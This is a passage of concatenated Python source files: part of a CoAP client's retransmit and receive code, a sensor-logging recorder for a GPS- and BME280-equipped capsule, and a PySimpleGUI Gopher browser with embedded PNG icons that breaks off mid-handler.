future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread = threading.Thread(target=self._retransmit,
name=str('%s-Retry-%d' % (threading.current_thread().name, message.mid)),
args=(transaction, message, future_time, 0))
transaction.retransmit_thread.start()
def _retransmit(self, transaction, message, future_time, retransmit_count):
"""
Thread function to retransmit the message in the future
:param transaction: the transaction that owns the message that needs retransmission
:param message: the message that needs the retransmission task
:param future_time: the amount of time to wait before a new attempt
:param retransmit_count: the number of retransmissions
"""
with transaction:
logger.debug("retransmit loop ... enter")
while retransmit_count <= defines.MAX_RETRANSMIT \
and (not message.acknowledged and not message.rejected) \
and not transaction.retransmit_stop.isSet():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not transaction.retransmit_stop.isSet():
retransmit_count += 1
future_time *= 2
if retransmit_count < defines.MAX_RETRANSMIT:
logger.debug("retransmit loop ... retransmit Request")
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
# Inform the user, that nothing was received
self._callback(None)
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
logger.debug("retransmit loop ... exit")
def receive_datagram(self):
"""
Receive datagram from the UDP socket and invoke the callback function.
"""
logger.debug("Start receiver Thread")
while not self.stopped.isSet():
self._socket.settimeout(0.1)
try:
datagram, addr = self._socket.recvfrom(1500)
except socket.timeout: # pragma: no cover
continue
except Exception as e: # pragma: no cover
if self._cb_ignore_read_exception is not None and isinstance(self._cb_ignore_read_exception, collections.Callable):
if self._cb_ignore_read_exception(e, self):
continue
return
else: # pragma: no cover
if len(datagram) == 0:
logger.debug("Exiting receiver Thread due to orderly shutdown on server end")
return
serializer = Serializer()
try:
host, port = addr
except ValueError:
host, port, tmp1, tmp2 = addr
source = (host, port)
message = serializer.deserialize(datagram, source)
if isinstance(message, Response):
logger.info("receive_datagram - " + str(message))
transaction, send_ack = self._messageLayer.receive_response(message)
if transaction is None: # pragma: no cover
continue
self._wait_for_retransmit_thread(transaction)
if send_ack:
self._send_ack(transaction)
self._blockLayer.receive_response(transaction)
if transaction.block_transfer:
self._send_block_request(transaction)
continue
elif transaction is None: # pragma: no cover
self._send_rst(transaction)
return
self._observeLayer.receive_response(transaction)
if transaction.notification: # pragma: no cover
ack = Message()
ack.type = defines.Types['ACK']
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
self._callback(transaction.response)
else:
self._callback(transaction.response)
elif isinstance(message, Message):
self._messageLayer.receive_empty(message)
logger.debug("Exiting receiver Thread due to request")
self._socket.close()
def _send_ack(self, transaction):
"""
Sends an ACK message for the response.
:param transaction: transaction that holds the response
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.response.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
def _send_rst(self, transaction): # pragma: no cover
"""
Sends an RST message for the response.
:param transaction: transaction that holds the response
"""
rst = Message()
rst.type = defines.Types['RST']
if not transaction.response.acknowledged:
rst = self._messageLayer.send_empty(transaction, transaction.response, rst)
self.send_datagram(rst)
|
measure_recorder.py
|
import time
import threading
import csv
import os.path
import datetime
import logging
class MeasureRecorder:
"""Records the measures and writes the to csv-file"""
def __init__(self, data_file, measure_frequency_sec, board, gps, bme280InCapsule, bme280Outside):
self._logger = logging.getLogger(self.__class__.__name__)
self._data_file = data_file
self._measure_frequency_sec = measure_frequency_sec
self._board = board
self._gps = gps
self._bme280InCapsule = bme280InCapsule
self._bme280Outside = bme280Outside
def start_measures(self):
thread = threading.Thread(target=self._start, name="MeasurerRecorderThread")
thread.start()
def _start(self):
if not os.path.exists(self._data_file):
header = ["time_utc", "board_temp", "board_volts_core", "board_volts_sdram_c", "board_volts_sdram_i", "board_volts_sdram_p", "board_throttled",
"gps_utc", "gps_latitude", "gps_longitude", "gps_altitude", "gps_speed_km/h", "gps_heading", "gps_ascending_rate_m/s",
"capsule_temp", "capsule_humidity", "capsule_pressure", "capsule_baro_altitude", "capsule_ascending_rate_m/s",
"out_temp", "out_humidity", "out_pressure", "out_baro_altitude", "out_ascending_rate_m/s"]
with open(self._data_file, 'wt') as csvfile:
writer = csv.writer(csvfile, delimiter=',')
writer.writerow(header)
while (True):
try:
with open(self._data_file, 'a') as csvfile:
startSample = datetime.datetime.utcnow()
gps_time = "n/a"
gps_latitude = 0
gps_longitude = 0
gps_altitude = 0
gps_speed = 0
gps_heading = 0
gps_ascending_rate = 0
try:
gps_time = time.strftime('%Y-%m-%dT%H:%M:%SZ', self._gps.utc())
gps_latitude = self._gps.latitude()
gps_longitude = self._gps.longitude()
gps_altitude = self._gps.altitude()
gps_speed = self._gps.speed()
gps_heading = self._gps.heading()
gps_ascending_rate = self._gps.ascending_rate()
except:
self._logger.exception("Error reading gps-sensor")
capsule_temp = 0
capsule_humidity = 0
capsule_pressure = 0
capsule_altitude = 0
capsule_ascending_rate = 0
try:
capsule_temp = self._bme280InCapsule.temp()
capsule_humidity = self._bme280InCapsule.humidity()
capsule_pressure = self._bme280InCapsule.pressure()
capsule_altitude = self._bme280InCapsule.altitude()
capsule_ascending_rate = self._bme280InCapsule.ascending_rate()
except:
self._logger.exception("Error reading capsule-bme280-sensor")
outside_temp = 0
outside_humidity = 0
outside_pressure = 0
outside_altitude = 0
outside_ascending_rate = 0
try:
outside_temp = self._bme280Outside.temp()
outside_humidity = self._bme280Outside.humidity()
outside_pressure = self._bme280Outside.pressure()
outside_altitude = self._bme280Outside.altitude()
outside_ascending_rate = self._bme280Outside.ascending_rate()
except:
self._logger.exception("Error reading outside-bme280-sensor")
data = [startSample.replace(tzinfo=datetime.timezone.utc).isoformat(timespec='milliseconds'),
self._board.temp(),
self._board.volt_core(),
self._board.volt_sdram_c(),
self._board.volt_sdram_i(),
self._board.volt_sdram_p(),
self._board.throttled(), #0x5 means: under voltage, currently throttled. See https://www.raspberrypi.org/forums/viewtopic.php?f=63&t=147781&start=50#p972790
gps_time,
"{:0.6f}".format(gps_latitude),
"{:0.6f}".format(gps_longitude),
"{:0.2f}".format(gps_altitude),
"{:0.2f}".format(gps_speed),
"{:0.2f}".format(gps_heading),
"{:0.2f}".format(gps_ascending_rate),
"{:0.2f}".format(capsule_temp),
"{:0.2f}".format(capsule_humidity),
"{:0.5f}".format(capsule_pressure),
"{:0.2f}".format(capsule_altitude),
"{:0.2f}".format(capsule_ascending_rate),
"{:0.2f}".format(outside_temp),
"{:0.2f}".format(outside_humidity),
"{:0.5f}".format(outside_pressure),
"{:0.2f}".format(outside_altitude),
"{:0.2f}".format(outside_ascending_rate)
]
writer = csv.writer(csvfile, delimiter=',')
writer.writerow(data)
endSample = datetime.datetime.utcnow()
timeToReadSensors = (endSample - startSample).total_seconds()
sleepTime = self._measure_frequency_sec
if (timeToReadSensors < self._measure_frequency_sec):
sleepTime -= timeToReadSensors
except:
self._logger.exception("Exception in measure_recorder-loop")
time.sleep(sleepTime)
|
TreeGopher.py
|
import queue
import threading
import pituophis
import PySimpleGUI as sg
import pyperclip
import os
# This is a graphical Gopher client in under 250 lines of code, implemented with Pituophis and PySimpleGUI for an interface. Pyperclip is used for the "Copy URL" feature.
# A tree is used for loading in menus, similar to the likes of WSGopher32 and Cyberdog. Backlinks are cut out, and menus are trimmed of blank selectors. Threaded binary downloads are supported as well.
# Based on the Chat interface example here: https://pysimplegui.trinket.io/demo-programs#/demo-programs/chat-instant-message-front-end
icons = {'1': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAAsSAAALEgHS3X78AAABnUlEQVQ4y8WSv2rUQRSFv7vZgJFFsQg2EkWb4AvEJ8hqKVilSmFn3iNvIAp21oIW9haihBRKiqwElMVsIJjNrprsOr/5dyzml3UhEQIWHhjmcpn7zblw4B9lJ8Xag9mlmQb3AJzX3tOX8Tngzg349q7t5xcfzpKGhOFHnjx+9qLTzW8wsmFTL2Gzk7Y2O/k9kCbtwUZbV+Zvo8Md3PALrjoiqsKSR9ljpAJpwOsNtlfXfRvoNU8Arr/NsVo0ry5z4dZN5hoGqEzYDChBOoKwS/vSq0XW3y5NAI/uN1cvLqzQur4MCpBGEEd1PQDfQ74HYR+LfeQOAOYAmgAmbly+dgfid5CHPIKqC74L8RDyGPIYy7+QQjFWa7ICsQ8SpB/IfcJSDVMAJUwJkYDMNOEPIBxA/gnuMyYPijXAI3lMse7FGnIKsIuqrxgRSeXOoYZUCI8pIKW/OHA7kD2YYcpAKgM5ABXk4qSsdJaDOMCsgTIYAlL5TQFTyUIZDmev0N/bnwqnylEBQS45UKnHx/lUlFvA3fo+jwR8ALb47/oNma38cuqiJ9AAAAAASUVORK5CYII=',
'0': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACRklEQVQ4jX3TvU8iQRgGcGorG5PNJlzOHImFxXXmSgu1pLYkFhbGFmta6Cn8U6ysbAzgfgwwM6y7sx8z67IgMuoq1XPNSSTovclTvr95JpMplf5No9HYbLfbRrvdNlqtltFqtYxGo2HU63WjXq8bZ2dnRq1WM2q1mnF6erpR+jyXl5cbhJDb0WgkP4dzLhljklIqh8OhJIRI27blzc3N7f7+/uYSaDabJudcBUGAKIoQRRHiOEaSJJBSrsVxnLRarZqlT/VNzrkKwxBxHMN1XXQ6HXS73bWkaQpCyNdAFEWQUsLzPDDGwDnHaDRaSZZl68DFxYXJOVdCCKRpin6/j16vB8uy1pLnOQgh6eHh4SrAGFNCCDw8PEAIAc/zcH9/D9/34fs+giBAEASYTqfrwPn5uUkpVUopZFkGSiksy4Jt23AcB67rghACQghms9n3QJqmGI/HCMMQvu9DCIE8zzGfz6G1htYa8/kcg8FgFTg5OTGHw6EKggB5nq8AYRiuPOvz8zP6/f4qcHx8bBJCVJIkmEwmiOMYQojlopQSSikopfD6+vo9kGUZJpMJOOfLOw8GA1BKwRgDYwxFUawD1WrVdF1XZVmG6XSKJEmW1T9OXywWWCwWXwMHBwc/er3e+KPB4+Mjnp6eoLXGy8sLiqLA+/s73t7eUBQFbNvO9/b2tpeAYRg/r66uPMuyZp1OR3e7XX13d6cty9KO42jXdZehlI6vr6+9ra2tysqP3NnZ2d7d3f1dqVT+/C9HR0flcrn862PvLwGSkDy9SoL4AAAAAElFTkSuQmCC',
'7': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACqUlEQVQ4jY2SXUhTYRjHn4pQtEJDGUU3dSV4U0hEV43uRlcl1oVd2Ae7KD+mJZUEnhzuhB+JLXaQdTbzuCMu54VG0XHfx2Q723Eed+bcmdOsdCOn6NRFmjvdSIjm6g/Pzfvw+/Hw5wXYlcbGRoler5d2d3dfRVH0zO592lAURbJj/vVP3kDK7vanRseDG3a7/XNbW1vOP2Gapm20J7CFGlyBN0PC5OuPQf6pbsTTRzFrHMetdXR05O0LDw4O1g97+C1VD8vNLawvRBeT8fB84isjxIVHuJvuG2JXaZqO7StwOOilZ7gtyghxYSa2+mX2e2I6HF3h2ak4qzTybxVqi9Pnn/yFouj5PTCCIHnOESZZrbFy3qlF/8TsMhuaTwxPfFs2U6NzpELHNt9usbx3jYVEg8FQt0eAomiuy+1NVr2yBCkuavEKC++4mSXSNh5TPiZ8d6txtu5Oi8Pk4UKiTqcr3yMQRfGAw+GIvyCd8XKt96UCZxUKLXvtPu6+WImz16twtvaJxuL0jQd+VlRUnPtrB11dXWVCOJKq1ph99zB3faWWvVWlZW9Uall5WbO5x8cLmwRBTO1bIgAARVF6IRxJYSZXrFZjZh5iFstzwhka9QspnudTnZ2dolKptKWVkCT5gGGYlYnJ0AYfDG1yHLdOEMQHkiSTJpNJVKvVokqlmk4rQRAkE0GQgoaGhgtyufwEABwsKSnJxzDsR29vr4hhmNjU1JQoKio6vJM7BACZAHAUAHIpiroUiURqwuFwTX9//2UAkGRlZZ1sb29fIklSHBgYEI1G45+PdXAHfBwAJMXFxQU4jss0Gs0VqVR6FgBOA8ApAJC0traGgsGgaLVaVwoLC4/sviIDALIB4BgA5ABA7vbkbL9lA0BGaWnpTZlMlp+2i//Nb4XAbVOmOUFgAAAAAElFTkSuQmCC',
'h': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAC60lEQVQ4jYWTa0jTARTFb2grQijsW0kULfqW9sIia1ZkWVSmWRFhWUJqrexhoLMaFOTUMgktH/goclqW23y0NfO5Tc1tOififC7XKKnUzE3d+v9PX2JYjTyfz/lxufdcojkVvGBuz1+KFxbsyyySS4pK6npyimu7EkRSKf/Gs4srVwYu/G+Qy+UvKBLXNNU2GxiVthszMzOofqeCrNWCPJkeoqzX1qDTGRvdhgMDAz1lco21obULGm0njOYvqGvrhqrLCoV+GMrG9+jtG4SyrunnzmMJ2/4B5D1XvmIYBlNTU9C1G9BtHcOHcRYGix1KTTsmbTYwDAOr1Yr0zMIfXO6s3fj78326TQNOlmVRp2qF6fM0zOOAeRzosNjRqjeiuLIJFUo1+voHoNXqcDRSmOQCCO6Kjw8OWSBRNKGxdwL9o8DgGNAz4oTKaMGMwwGbzYbhj5+gbTfgtawaUXxhpwsgTHuR0qLvwlN5B6oMo2joncR7sx2a/gk064xgWRYsy8Jut+NVhQLil+U4fO6eiiicQ0REMQnFcQ9KtciXatDTb0bp2zaINZ9Q1GBBgUyDD8Mf8X3iB0ZGRqDV6XBB8BAhEaJ61wRHIlK3CvMbmTxpC1iWhcPhQJlCg5SyTgjFBlzNbUZW8RuYTCZUVb/BgeiHCD52+7EL4Od3ZsmlZJk+KVuJ0bExOJ1OfPk6irisesRmqhGRVovr919ArVYj80kuDkamTvP2Xtr5xxm3H0k8ESuqdCRnl2FoaAjZT8twUlSDsDtyBAsqcCoxFxKJBGf4Quw+GCdx16XVG4LO5ySlP2eq5Qrsu/YMu+LLwbtSiu2xheBFPUK84A627DlrIs+FPCLy/huwjIh2rPENyg6NFHwLu5rLHrqch/0xjxESnYHgEzcn/fxDaz08PMKJyJeI3D6ZNxGt53C8w3xWbL61btPhEr+AsPJVawMyvLyWRxMRj4jWENF8d+HZmkdEi34DlxLRYiLiuDP+AiIvzWJ84dNQAAAAAElFTkSuQmCC',
'i': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAJUlEQVQ4jWNgGAWjYBQME8D4//9/TkZGxu+kavz//z83AwODEQAPzAc8kOdqJQAAAABJRU5ErkJggg==',
'3': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACuklEQVQ4jX3T20pUcRQG8A8cpPZpcnSHmmZmhGVjBzTNiMxy//fM1OigXfUARVc9QvQMkQTdRFAg1E0lIlu0k5SlNZmZZzPMpnL27BkPeZi+LppMwVrw3a3fWjdrARtUl8tVNZSdfWVk5847IwUFtwezsi4/crmqNupdVy+A3eNeb6fj960sNTYwWV/HZKiei40NtE1jebSkpL0L2LUhHpVl75ejVZGfoRB/+nxMmiaTpsll0+SSaXJJCC7UBfmpony6Nz197zrcAuhTZQcnk2dOc+UPEoKLQvCHEFwQgvNCcE4Izgb8HCvdN2YBmasDhgsLbvwI+FfRHzAvBGeFYMIwGDcMOobBWG0to8JgOD+nCQBwE8icKjs0tWCaf7cIwYQQjAvxGwlBWwhGDYMzQvC7z8chb8nHZsCDTqD8W/VxzgYCTDQ1MW5ZjFsWnTWJtbUxZlmMWRaj164xEghw4shh3gf2o2vz5rMzp2roBIOMt7czkUisSywWo23btG2bjuMw2trKz8EgxyvL2ZGWVo9nLlfNtHGSM6EQnY6OVRiPx1fh2kzfusXR4mIOFBfRAo6hGdg2VFqSiBgGI34/pyoqOJGTwzG3myOaxmFN45Cm8YOqckBV+V5V+U5V2FuYG70L5KAZSO/Zkdc6rmdxVNM4kgKDqsoPKdCvKHynKOxTFIZlmWHPFj7epj+oBlwAAAs40leUPze4Zkt/CrxNodeyzF5ZZo8k8fn27MRDoGzdMT3V5Evh7bnLfZrGsCzzTQr1SBJfSRJfShJfyjK78rcudyrSxQ3P+bFbudBdkPv1te5hr2cLuxWF3bLM7gw3n+sePsnTI21u6fy/fmkTgKITQMP1DO3Bva2eiZY83b6fpzvNesbkVY/cWgmcA1AKQP/fU0oAcgHsOQBUlwI1ALwAdgDIAJC2tvkXFRyzrLKhFPAAAAAASUVORK5CYII=',
'9': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAC+0lEQVQ4jXVSX0gbBxz+tm7UIt2cL33pU0tf7MPc9jAGUgajb3kb+NI+CC10o+QhQ7YnEXTii4IpZEnUwD0UhRj1vJx3OfLv4sXsDAQ1eGpcjH849e6yIxcNadfBfn1ZS632e/6+D74/wAfg8XjaBUFQ4/H4kc/n6/wQ7xxCodADt9v9GQB4vd5v8vn8i62tLYpEIh4A6OnpaYlEIj9dEIbD4Svz8/OPFEX5JxqN/smy7G/pdHr14OCATNOkzc3NciaT8aqqmrJtm1Kp1HO32331nAnDMD9ns9lXGxsbpGka6bpOlmXR6ekpNZtNsm2bHMch0zRJFMVnl0YQBCGxt7dHx8fHZNs2NRoNchyH6vU62bZN1WqV8vn8Xm9vb+sF8cDAwN1CoVA3DIMcxyHDMHRZlseTyeTvOzs7a4Zh0NHREZVKJWIY5qnH42kHAIyPj3dyHMepqlqwLIvOzs6oWq3+t7Cw8Osb80AgcH91dXV/d3eXNE2jXC5XEwRhPRAI/IKpqaknlUqFarUaNZtNajQaVKlUzgYHB2+/M+k1SZJSxWKRVlZWaGlpiRKJBPn9/ikEg8HbsVjsD1VVs/V6nWq1GpmmSSzLDgWDwU8BwO/3/yjL8kkul6NMJkPhcHglFAr1jY6OfvW2A6/Xe2d7e/vUsiw6OTmhcrn8tyzLYVEUJwuFwl+KolA8HqdoNEoTExMPL11BUZS4rut0eHhIpVKJ1tfXSVVVkmWZYrEYsSxLHMe9GBsbu3dBPDc397RcLr/a39+nYrFIa2trtLy8TMlkkgRBIJ7naXFxkRKJBHEcVxgaGrpx7onpdPqJpmkveZ5PTU5ODs7MzGxIkvQvz/M0Ozur+3y+0MjIyANJknanp6fnLkvQ2tfX97itra0TwHcdHR0PGYbRRVGk/v7+GQD3AHS6XK7vAXwB4KP3Da4CuAHgDoCvW1pafhgeHs4yDGN1d3f3AvgWQAeAmwCuX1ri//gYwDUAn3d1dd1yuVxfAmgH0Argk/fJrwEaXuWjl/RWWwAAAABJRU5ErkJggg==',
'I': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABNklEQVQ4jWNQtnE47NvUdYAcrGLjcJzBr7VrX9W56//Jwb5NXQeINiB314HTwgpKV0VVVG/n7z1ykWQD+GVlTzJAgYiS2j2KDBBWVnlAsgF5Ow+fEZJXuiiipHwzb+/RCyQbQFIghkyYsb/46Nm7ZBkQOWv+XgYGBncRJdUZ5ScvPUaWKzxw4lLlmas/cBqQsmbTEQYGhghoWLFJaOstrDh15WXVuev/wyfO3MPAxJRjkZC2qeLM1b8YBuTtPHyGiZ09hwEVcMmbWS6zTEzdzMDAYAwV0/CsbtyGYkDRoZPXuISEGhiwAz4GBgYRNDHL8Glzd/s2dR1gMAmPOSIgIzeJgYGBEYcBuICvpIbOdQYGBoZdDAwMLCRqhoGJDAwMDC1kamZgYGBoYGBgYFjLwMBQQyZeAwCR3MS3bOe39AAAAABJRU5ErkJggg==',
'g': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABsUlEQVQ4ja2TTUsbURSG/SEttMY2m7rQKli6sIIrv9qJSZxMMr2TScebmBhc+EFLoBXLCMai1tAPbSkUuhKz6aZQiiLqQqR04cKlSUBwVcj8gKcLsWWSSRHaF57Nuee8vJd7blPT/5IwdXQzhmEJN6MGUVNDmDoNh+OPBAufbF4fLDG7NcPjr1kXohhAjY94G8QtgydrU4higN71TnoKt7m32u6ie7mNoBHwNtDMCN0v27nzvJWu2VsNURNhbwNrbJz9isNOqcpuucp+xWG37LBdctgqOXw7qVI8/ok1Me1tIJIZPvw4Y+37GbmVd0gpXcwsv0dKiWElXfVcLnduqMs0+b0yk4tvkVJSq4ta7ZmU8tzASKZZP6y4GmupNXIlSKQybByd1jVcOkEilWbzqMyzlTeXukJdAmGZFL5ssPj5I9P207r40ZSClJKHRsw9+HsPjBCThRDjS71kVu+SfdWBmPNzf+Iag1kfD6auo9ktKOEB72cMxvrQbB/qXDPq/BW0F1dR8z6G528wbPsJL/gJ5W+iRPob7IGpo4z0EdQGCUYvGPpDbAgl0v/3z/Qv+gW72bfPiU6yowAAAABJRU5ErkJggg==',
'M': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACgElEQVQ4jY2TO0/bYBSGrbZbh6oLXZEYUlUZarAipAoJib3/gaVTGaqOXRg6IDFWghE1HVARU5cCQSStycVOsENNnNi52LG/OL7ks3MRioQEb5cWkSJEX+noLOd5zlkOw9yRnZ2dl/lsdiWb/blyfJx+u7q6+uiu2VtRVfUdpfQyiiIEQQDf99Go1zvJZHLqXliv1T6EYXjlui46nQ4sy4JhGDAMA7qu93ief3onXFGU977vX90EG40GNE2DqqqoVqsol2VnbW3tyS1YKhZf+75/ads2TNOcABVFQblcBs/zODk5QaGQq0zA6+vrU47jRKZpotlsQtf1P9vKyOVy0HUdrutiPB5DkiTIsoxUav/jtWB7a2u62yX9mlZDqVSCoihwHAfD4RAXFxc4Pz/HaDTCcDgEIQSqquLoKPV5QuC6TmTZFvr9PsbjMUajEQaDAfr9PsIwBKUUvV4PkiTBdV2kUv8IHKcTDQYDyKcymq0mPM+D67rXvdvtolgsot1uw3EcHBzsJW8JoihCGIY4TB8im88i/SONDJ9Bhs8gnUnj7OwM3W4XhBDs7d0QbG1uTtu2FfV6PQRBAK2uodVuwQ98EELQbDWRF/PQ6hoIIbAsC/v7379MCEzTjDzPg9E2EIYhPM+D4zjodDoghMC2bVSqFWi6dlvwZnl5tl7Xh57vgYZ0ArIsa6JaRgsto4Xd3a/fGIZ5yDAMwywuvuJEUSC/TuWeLJeoJJVoqVSkpaJIRVGkoihQQRCoIBSoUChQQRCCjY1P2wzDPP57xIOlpYUXC/Pzs4lEgkskWC7BshzLshzLxjk2Hufi8TgXj8e4WCzGzc3NPZ+ZeXb/Y/1PfgOxF0ZCQvJSWwAAAABJRU5ErkJggg==', # mail/newsletter type, example here: gopher://rawtext.club/M/~cmccabe/pubnixhist/nixpub/1991-01-11
'cache': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACu0lEQVQ4ja2SSUwTUBCGB8FYQZTEAydMuHjRi8STB2PEcJIWJAgCgikURYJsrUrYqoSKLJaWrexBgQIa6EJBoC0CLWCAllpaKIiRRRRZIxe98HuwGIV68yVfXl4y/5d5mSH6n4d/6xIjh+vnvUcB1/8XGXsEexels7z+KdDJC6MmxgaxYFFj0aqBuTcP4+0pmOhIhUHGg1HOg7Ez60cB18/NoWBcxW+wdD2Atfshpl+nYaY3Hba+DMyqMzGnycZ7LR8fBnKgV+b7ORTM64VLX8afYXWiGGsGEdaNYmyYSrH5rgxb5nJsT0mwbZFgfrRccCBcJYg8/WnyOVZM9Vgx1eOz/T7AZD2sg2XDBwSvJMnne6vCoCoJRKc4AEoRC8piJhTF/lAI/SEXXv1NpyTS/GfWiYgYubxrPrqmO9DWhkNTHQZ11Q28LGShNZ8JuSgQ3WVB6CoJhEocgK5K9l8dHCIiL78L3hcNMh5GpLEYbuJA3xiNtqJgyMQhUJSG4k19JPprI6CtCYe6IU67/wdePmc8L1t6sjEpT4axIwmG9ntQVkRBUR6BwRexeNsah1HpbQw3x0LXltq5X3DylOeJK7P9Atj6MjDTk46umlioqmPQXRMDZSUbQ83xMClSYJQlY6Q9TbpfcMiN4eI7P1S4u6h/goUhAab7sqFtTICuJRED0kTMabIxq86ErTcDYyp+naM1OPtxVLS7ZhTjq0GE1XEhrOrHGGjhYnk0H8sjT7E0nIdFnQBT6vxSRwKPZUPl9x1bHXZmavFtugbblipsmSXYNFdgw1SG9ckSrBnEsPYL8+zTIyIiFyJyJSKPR/dDfbOSw1i8u8EhiTGsyIRoJjuBw+QkcgI5KfFB7PSksJu5mezrCdHMc0R0jIgO7+2Bs/1xhIiOEpEbEbkT0XE77vaAKxEx7LXOROT0E4+/rF25GHCBAAAAAElFTkSuQmCC'
}
icons['p'] = icons['I'] # pngs
texttypes = ['0', '1', '7', 'h', 'M']
gophertree = sg.TreeData()
sg.theme('DarkTeal1') # Add a touch of color
context_menu = ['', '&Copy URL']
text_menu = ['', ['&Save...', '&Copy File URL']]
gophermenu_layout = sg.Tree(data=gophertree, headings=[], change_submits=True,
auto_size_columns=True, num_rows=26, col0_width=80, max_col_width=200, key='_TREE_', show_expanded=True, enable_events=True, right_click_menu=context_menu, font='Consolas 10', background_color='#fff', text_color='#000')
plaintext_layout = sg.Multiline(key='-OUTPUT-', size=(80, 35), font=('Consolas 10'), background_color='#fff', right_click_menu=text_menu, autoscroll=False, disabled=True, metadata='')
layout = [[gophermenu_layout, plaintext_layout],
[sg.Button('<'), sg.Input(size=(84, 5), key='-QUERY-', do_not_clear=True, default_text="gopher://gopherproject.org/1/", enable_events=True), sg.Button('Go'), sg.Button('Clear Cache'), sg.Checkbox('Use hierarchy', key='-USETREE-', default=True), sg.Text('...', key='-LOADING-', visible=False)],
[sg.StatusBar(text='0 menus in cache.', key='-CACHE-'), sg.Text('', key='-DOWNLOADS-', visible=True, size=(60, 1))]]
window = sg.Window('TreeGopher', layout, font=('Segoe UI', ' 13'), default_button_element_size=(8, 1))
openNodes = []
cache = {}
loadedTextURL = ''
def trim_menu(menu):
try:
while menu[-1].text == '':
del menu[-1]
except:
pass
try:
while menu[0].text == '':
del menu[0]
except:
pass
return menu
def populate(parentNode, request):
global gophertree, openNodes
window.FindElement('-QUERY-').update(request.url())
window.FindElement('-LOADING-').update(visible=True)
if not parentNode in openNodes:
passes = 0
from_cache = False
try:
if request.url() in cache:
from_cache = True
resp = cache[request.url()]
else:
resp = request.get()
cache[request.url()] = resp
passes += 1
except:
sg.popup("We're sorry!", request.url() + ' could not be fetched. Try again later.')
if passes == 1:
try:
menu = trim_menu(resp.menu())
passes += 1
except:
sg.popup("We're sorry!", request.url() + ' could not be parsed as a menu for one reason or another.')
if passes == 2:
if from_cache:
gophertree.insert(parentNode, request.url() + ' <cached>', text='- This is a cached menu, double click to go to the live version -', values=[], icon=icons['cache'])
for item in menu:
if not item.request().url() in openNodes:
sub_url = item.request().url()
if item.path.startswith("URL:"):
sub_url = item.path[4:]
if item.type in icons:
icon = icons[item.type]
else:
icon = icons['9']
if item.type == 'i':
gophertree.insert(parentNode, sub_url,
text=item.text, values=[], icon=icon)
else:
gophertree.insert(parentNode, sub_url, text=item.text, values=[
sub_url], icon=icon)
openNodes.append(parentNode)
window.FindElement('_TREE_').Update(gophertree)
window.FindElement('-LOADING-').update(visible=False)
gui_queue = queue.Queue()
def download_thread(req, dlpath, gui_queue): # This uses Pituophis' Request().stream() function to download a file chunks at a time (instead of all in one shot like with .get())
with open(dlpath, "wb") as dl:
remote_file = req.stream().makefile('rb')
while True:
piece = remote_file.read(1024)
if not piece:
break
dl.write(piece)
gui_queue.put(dlpath) # put a message into queue for GUI
history = []
def dlPopup(url):
return sg.popup_get_file('Where to save this file?', 'Download {}'.format(
url), default_path=url.split('/')[-1], save_as=True)
def go(url):
global gophertree, openNodes, loadedTextURL
window.FindElement('-LOADING-').update(visible=True)
req = pituophis.parse_url(url)
window.FindElement('-QUERY-').update(req.url())
if req.type in texttypes:
if req.type in ['1', '7']:
gophertree = sg.TreeData()
gophertree.insert('', key=req.url(), text=req.url(),
values=[req.url()], icon=icons[req.type])
parentNode = req.url()
history.append(req.url())
openNodes = []
populate(parentNode, req)
else:
try:
resp = req.get()
loadedTextURL = req.url()
window.FindElement('-OUTPUT-').update(resp.text())
except:
sg.popup("We're sorry!", req.url() + ' could not be fetched. Try again later.')
else:
dlpath = dlPopup(req.url())
if not dlpath is None:
window.FindElement('-DOWNLOADS-').update(value='Downloading {}'.format(dlpath))
threading.Thread(target=download_thread, args=(req, dlpath, gui_queue), daemon=True).start()
window.FindElement('-LOADING-').update(visible=False)
def plural(x):
if x > 1 or x < 1:
return 's'
return ''
previousvalue = None
while True: # The Event Loop
event, value = window.read()
if event in (None, 'Exit'): # quit if exit button or X
break
elif event == '_TREE_':
if value == previousvalue:
previousevent = None
# DOUBLE CLICK
# TODO: cooldown
window.FindElement('-LOADING-').update(visible=True)
url = value['_TREE_'][0]
if url.endswith(' <cached>'):
url = url[:-9]
del cache[url]
go(url)
else:
if url.startswith('gopher'):
req = pituophis.parse_url(url)
if req.type == '1':
parentNode = url
if value['-USETREE-']:
populate(parentNode, req)
else:
go(parentNode)
elif req.type == '7':
q = sg.popup_get_text('Search on ' + req.host, '')
if not q is None:
req.query = q
go(req.url())
elif req.type != 'i':
go(req.url())
window.FindElement('-LOADING-').update(visible=False)
else:
os.startfile(url)
previousvalue = value
elif event == 'Go':
go(value['-QUERY-'].rstrip())
elif event == '<':
if len(history) > 1:
h = history[-2]
history.remove(h)
history.remove(history[-1])
go(h)
elif event == 'Copy URL':
url = value['_TREE_'][0]
if url.endswith(' <cached>'):
url = url[:-9]
pyperclip.copy(url)
elif event == 'Copy File URL':
pyperclip.copy(loadedTextURL)
elif event == 'Save...':
